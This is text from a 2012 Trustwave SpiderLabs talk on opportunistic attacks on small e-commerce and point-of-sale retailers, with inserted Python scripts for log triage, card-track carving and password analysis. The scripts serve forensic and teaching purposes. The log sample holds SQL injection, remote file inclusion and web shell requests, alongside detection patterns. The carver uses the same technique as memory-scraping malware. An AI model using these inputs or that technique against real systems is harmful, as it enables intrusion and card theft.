Trustwave SpiderLabs uses real-world and innovative security research to improve
Trustwave products, and provides unmatched expertise and intelligence to customers.

Response and Investigation (R&I)

Analysis and Testing (A&T) 
Research and Development (R&D) 
Marketing made me do it

Buzzword Bingo



How many times are the following words mentioned 
in the conference agenda? 
Cloud

Mobile / Phone / Android

Targeted Attacks

Trustwave 2012 Global Security Report




Results from more than 300 incident response 
and forensic investigations performed in 18 
countries. 

More than 60 IR projects in Australia and New Zealand 

Analysis from more than 2,000 manual 
penetration tests and 2 million network and 
application vulnerability scans. 

Review of more than 25 different anti-virus 
vendors. 

Usage and weakness trends of more than 2 million
real-world passwords from corporate information
systems.

Targeted Attacks?

• Two reasons to perform an attack 

• Ideological 

• Financial gain 



Ideological = targeted attack 

• Attacker is motivated by their desire to raise awareness about 
a topic of interest relating to the target 

• Specific target may take longer to compromise but attacker 
invests time due to perceived ideological gain 
Financial Gain




Financial gain = path of least resistance 

• For many, this is a business 

• They wish to make the most they can by spending the least

• The "weakest link" cliché applies



Targets chosen on what they are, not who they are 

• Targets chosen as they have a specific vulnerability 

• Attackers invest in tooling targeting these vulnerabilities 

• These bring the marginal cost of compromise down to zero 

• The attackers' job is to find as many targets as possible

Targeted vs Opportunistic

• We investigated a single targeted case last year 

• The rest were opportunistic attacks 

• We as a community hear about targeted attacks 

• Compulsory disclosure in USA 

• Larger targets 

• Attackers release details (ideological) 

• We don't hear about opportunistic attacks 
"Why would they hack me..."

• This is the first thing we hear from a victim 

• "...I'm just a ..." 

• "... I only process a few credit cards a year" 



Almost all victim businesses were less than 50 employees 



"But my IT guy said everything was safe"

System Responsibility



Pie chart: Self 24%, Third Party 76%

75% of cases: a third party was
responsible for a major component of
system admin

Source: Trustwave 2012 Global Security Report

Victim Industries



Pie chart: Retail 82%

Those industries that
we expect to be
targets (e.g. Finance,
critical infrastructure)
tend to account for a
small number of cases

Victim Assets



Bar chart (share of cases):

Software POS 55%
E-Commerce 40%
Employee Workstation 3%
Business System 2%

E-Commerce Attacks

Average Victim



Experienced bricks and mortar retail outlet that has expanded 
its presence online 

Majority are less than 5,000 transactions per year 

Most make use of off the shelf shopping cart applications 

• X-Cart, Lite Commerce, osCommerce, Zen Cart, Magento, 
Product Cart 

Use third parties for initial setup, hosting and maintenance 

Most sites are borderline profitable 
Discovery




Attackers locate potential victims a number of ways 

• Blindly scanning for vulnerabilities 

- Often focus on a single vulnerability 

- Sometimes scan for a handful 

- User agents indicate the use of industry standard tools (e.g. Havij 
for SQL Injection) 

• Googling for strings that identify certain web applications 

- E.g. Pages specific to osCommerce 
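The discovery traffic described above leaves the same traces in every victim's web server logs, which is how an investigator tells an opportunistic scan from anything targeted. The script below is an added example, not code from the presentation or from Trustwave: it parses combined-format access log lines and flags the indicators named on this and the following slides (a Havij user agent, SQL injection in a parameter, a remote file inclusion URL, and PHP executing out of an upload directory). The log lines are constructed; the tool names in SCANNER_UA, the SQLI_RE patterns and the UPLOAD_DIRS paths are assumptions for illustration, not a vendor signature set.

```python
"""Triage web server access logs for opportunistic e-commerce attack indicators.

Added example, not code from the presentation or from Trustwave. The log lines
are constructed and the indicator lists are assumptions for illustration.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SCANNER_UA = ("havij", "sqlmap", "nikto", "acunetix")  # assumed tool names
SQLI_RE = re.compile(
    r"(union\s+(all\s+)?select|'\s*(or|and)\s+\d+\s*=\s*\d+|sleep\(\d+\)"
    r"|information_schema|--\s*$|/\*.*\*/)",
    re.IGNORECASE,
)
RFI_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
UPLOAD_DIRS = ("/images/", "/uploads/", "/media/")  # assumed upload-only paths

# Constructed log excerpt: a legitimate request, a Havij SQLi probe, an RFI
# attempt against an include parameter, and a web shell dropped via upload.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jun/2012:10:01:02 +1000] "GET /product_info.php?products_id=31 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jun/2012:10:02:11 +1000] "GET /product_info.php?products_id=31'%20AND%201=1-- HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Havij)"
198.51.100.9 - - [04/Jun/2012:10:03:45 +1000] "GET /admin/includes/functions.php?include_path=http://198.51.100.9/c.txt? HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2012:10:04:01 +1000] "POST /admin/categories.php?action=new_product_preview HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2012:10:04:09 +1000] "GET /images/shell.php?cmd=id HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the sorted list of indicator names that fire on one parsed entry."""
    hits = []
    if any(tool in entry["ua"].lower() for tool in SCANNER_UA):
        hits.append("scanner-ua")
    parts = urlsplit(entry["url"])
    path = unquote_plus(parts.path).lower()
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode catches double encoding
        if SQLI_RE.search(value):
            hits.append("sqli")
        if RFI_RE.match(value):
            hits.append("rfi")
    # Server-side code running from a directory that should only hold uploads.
    if path.endswith((".php", ".phtml")) and path.startswith(UPLOAD_DIRS):
        hits.append("webshell")
    return sorted(set(hits))


def triage(lines):
    """Return (ip, url, indicators) for every line that fires at least one indicator."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry:
            hits = classify(entry)
            if hits:
                findings.append((entry["ip"], entry["url"], hits))
    return findings


if __name__ == "__main__":
    for ip, url, hits in triage(SAMPLE_LOG.splitlines()):
        print(ip, ",".join(hits), url)
```

Run against a real log the same three source addresses would typically show up hundreds of times, each hitting one parameter on one script: that is the "single vulnerability" scanning pattern the slide describes, and the upload-then-request sequence from the same address is the signature of the file upload entry method.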
Entry Method

Pie chart:

Remote File Inclusion 3%
File Upload Functionality 24%
45% (slice label not recovered)

Data Harvest Method




Pie chart:

Data Redirection 5%
In Transit 32%
63% (slice label not recovered)

Point of Sale Attacks

Average Victim




Experienced bricks and mortar retail outlet 
Often in a rural location 

• Most perceive some safety from not being in "the big smoke" 
Higher volume of transactions compared to e-commerce 
Most make use of one of a handful of software applications 
Use third parties for initial setup, hosting and maintenance 
Discovery



Unsure on how attackers discover potential victims
May be as simple as port scanning Australian IP ranges
• Some grouping of victims by location

Diagram: PIN entry device -> POS -> Acquirer

"Charge customer $x" (PIN entry device to POS)
Authorization message (POS to acquirer): important fields encrypted
Acquirer's response informs POS if transaction was successful or not

Entry Method




Remote Access 
Application 

100%

Data Harvest Method

In Transit

20% 



Stored 

80%

Malware Trends

Common and targeted

Many Differences

Common 

- Self- propagation 

through vulnerabilities 
or user actions 

- Widely distributed 

- Easily detectable by 

AV vendors 
Targeted

- No propagation and
  may not exploit
  vulnerabilities

- Application/system
  specific

- Only found in target
  environments

- Most found in
  Trustwave 2011
  investigations were
  undetectable by AV;
  only 12% by top AV
  vendors
Targeted Malware Types

Popular Types

• Memory Parser
  Obtains data in use
  out of system memory

• Keystroke Loggers
  target user and
  device input

• Application Specific
  hook the applications
  with access to
  target data

Pie chart (partly recovered): Network Sniffer 2.1%, CC Data Interceptor 7.9%, Application Specific 13.2%; the Memory Parser slice and a slice at 10.5% are not labelled in the extracted text

Source: Trustwave 2012 Global Security Report
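The memory parser described above, and the "Stored" versus "In Transit" harvest split on the point-of-sale slide, both come down to one pattern search: card track data sits in POS process memory in a fixed ISO/IEC 7813 layout while a transaction is authorised, and the malware carves it out with a regular expression. The script below is an added example, not code from the presentation or from Trustwave: it is the investigator's side of the same technique, run over a process dump or page file to find the data a memory parser would have taken, with a Luhn check so that random digit runs near real data do not become false positives. SAMPLE_MEMORY is constructed and uses the well-known test PAN 4111111111111111; the report masks PANs to BIN and last four as a report should.

```python
"""Carve payment-card track data out of a memory buffer and validate it.

Added example, not code from the presentation or from Trustwave. SAMPLE_MEMORY
is constructed; the regexes follow the ISO/IEC 7813 track 1 and track 2 layouts.
"""
import re
import sys

# Track 2: ;PAN=YYMM<service code + discretionary data>?
TRACK2_RE = re.compile(rb";(?P<pan>\d{13,19})=(?P<exp>\d{4})\d{3,}\?")
# Track 1: %B<PAN>^<NAME>^<YYMM>...?
TRACK1_RE = re.compile(rb"%B(?P<pan>\d{13,19})\^(?P<name>[^^]{2,26})\^(?P<exp>\d{4})[^?]*\?")


def luhn_ok(pan):
    """Luhn (ISO/IEC 7812) check over a digit string."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan):
    """Keep only the BIN (first six) and the last four digits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def carve_tracks(buf):
    """Return (offset, track, masked_pan, expiry) for every Luhn-valid hit, by offset."""
    hits = []
    for track, rx in (("track1", TRACK1_RE), ("track2", TRACK2_RE)):
        for m in rx.finditer(buf):
            pan = m.group("pan").decode()
            if not luhn_ok(pan):
                continue  # looks like a track but the PAN is noise
            hits.append((m.start(), track, mask(pan), m.group("exp").decode()))
    return sorted(hits)


# Constructed POS process memory: a track 1 and a track 2 record for the test
# PAN 4111111111111111, plus a lookalike record whose PAN fails Luhn.
SAMPLE_MEMORY = (
    b"\x00\x00POSApp v3.1\x00"
    b"%B4111111111111111^DOE/JOHN^25121011234567890?\x00\x00"
    b";4111111111111111=25121011234567890?\x00"
    b";4111111111111112=2512101?\x00"
    b"log: txn 000042 approved\x00"
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_MEMORY
    for offset, track, pan, exp in carve_tracks(data):
        print(f"{offset:#010x} {track} {pan} exp={exp}")
```

Hits in a process dump taken from a running POS are the "In Transit" case on the harvest slide; the same regex over swap, crash dumps or application log files finds the "Stored" case, which is why data retention appears in the defence list.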
Our Defenses



Basic controls 
Passwords


2.5+ Million Passwords 
Analyzed 

• All in use within 
the enterprise 

Common Weaknesses 

• Shared 'admin' p/w 

• New employee default p/w 

• Poor complexity requirement 

• 5% based on "password" 

• 1% based on "welcome" 




Character classes used (share of passwords analysed):

All Lower                    2.064%
All Upper                    0.031%
All Number                   0.240%
All Special                  0.004%
Lower/Upper                  0.094%
Lower/Number                36.540%
Upper/Number                 1.560%
Upper/Special                0.004%
Lower/Special                0.106%
Number/Special               0.004%
Lower/Upper/Number          20.311%
Lower/Upper/Special          0.822%
Upper/Number/Special         0.256%
Lower/Number/Special         5.115%
Lower/Upper/Number/Special  23.349%

Source: Trustwave 2012 Global Security Report

Bar chart of the most common passwords (labels mostly illegible); top entry: Password1
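The composition table and the "5% based on password / 1% based on welcome" figures are the output of a simple classification over the recovered password set. The script below is an added example, not code from the presentation or the Trustwave report: it labels each password with the same class names as the table, counts how many are a base word with case, digits, symbols or leet substitutions added, and reports reuse (the "shared admin password" weakness). SAMPLE_PASSWORDS is invented, and BASE_WORDS and the LEET map are assumptions drawn from the slide's two examples.

```python
"""Character-class composition, base-word and reuse analysis of a password set.

Added example, not code from the presentation or the Trustwave report.
SAMPLE_PASSWORDS is invented; BASE_WORDS and LEET are assumptions.
"""
from collections import Counter

BASE_WORDS = ("password", "welcome")
# Substitutions that still leave a password "based on" a dictionary word.
LEET = str.maketrans({"@": "a", "4": "a", "0": "o", "1": "i", "!": "i",
                      "3": "e", "$": "s", "5": "s", "7": "t"})


def composition(pw):
    """Label a password with the classes it uses, as in the table
    ('All Lower', 'Lower/Number', 'Lower/Upper/Number/Special', ...)."""
    present = []
    if any(c.islower() for c in pw):
        present.append("Lower")
    if any(c.isupper() for c in pw):
        present.append("Upper")
    if any(c.isdigit() for c in pw):
        present.append("Number")
    if any(not c.isalnum() for c in pw):
        present.append("Special")
    if not present:
        return "Empty"
    if len(present) == 1:
        return "All " + present[0]
    return "/".join(present)


def based_on(pw, word):
    """True if the password is the word with case, digits, symbols or
    leet substitutions added (e.g. P@ssw0rd1 -> password)."""
    return word in pw.lower().translate(LEET)


def analyse(passwords, base_words=BASE_WORDS):
    """Percentages (3 dp) per composition class and base word, plus reused values."""
    n = len(passwords)
    comp = Counter(composition(pw) for pw in passwords)
    exact = Counter(passwords)
    return {
        "composition": {k: round(100.0 * v / n, 3) for k, v in sorted(comp.items())},
        "base_words": {
            w: round(100.0 * sum(based_on(pw, w) for pw in passwords) / n, 3)
            for w in base_words
        },
        "reused": {pw: c for pw, c in exact.items() if c > 1},
    }


# Constructed sample, one entry per account; Password1 is deliberately shared.
SAMPLE_PASSWORDS = [
    "Password1", "password", "P@ssw0rd", "Welcome1", "welcome123",
    "summer2012", "letmein", "admin", "Admin123", "qwerty",
    "abc123", "Tr0ub4dor&3", "123456", "Spring2012!", "monkey",
    "Password1!", "Password1", "changeme", "ADMIN", "p4ssword",
]

if __name__ == "__main__":
    for section, rows in analyse(SAMPLE_PASSWORDS).items():
        print(section)
        for k, v in rows.items():
            print(f"  {k:<28} {v}")
```

Note what the table cannot show and this does: "Lower/Upper/Number/Special" passes most complexity policies, yet P@ssw0rd and Password1! both land in that class and both collapse to "password", which is why the base-word count matters more than the class breakdown.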
Anti-Virus

Source: Trustwave 2012 Global Security Report

Undetected
Malware

Not a Silver Bullet

Information
asymmetry: malware
authors/signature
writers

Arms race, signature
dependence

Results

• 70,000 malicious
  samples

• A/V identified 81% of
  all samples

• Lowest vendor scored
  just (figure not recovered)
Summary

Victims



Mostly non-technical 

Often relying on a third party for IT 

Rarely a recognisable brand name 

All surprised to learn that they have been compromised 
Attack Methods




Attack methods were very simple 

Remote access with weak password for Point of Sales 
systems 

SQL Injection / File Upload / Remote File Inclusion for ecom 

All well-understood issues that are easy to protect against

No 0-days, no targeted e-mails or social engineering, no 
covering of tracks, nothing fancy 



Trustwave SpiderLabs, 4/06/2012



Defence 



Stopping the majority of the attacks is simple 
Focus on the basics 

Password security 

Secure remote access 

Patch management 

Data retention 

Application security 
Action Plan

• Highly targeted attacks are certainly a concern 

• In planning for these, be careful not to lose sight of the 
basics 

• Many of the basic controls are also helpful in preventing 
targeted attacks 

• Ensure that your service providers are well behaved 
Questions?

Resources




Download the report: www.trustwave.com/GSR 
Follow us online: 

• Twitter: @Trustwave / @SpiderLabs 

• Facebook: http://www.facebook.com/Trustwave 

• LinkedIn: http://www.linkedin.com/company/trustwave

• Google+: https://plus.google.com/103260594120163717290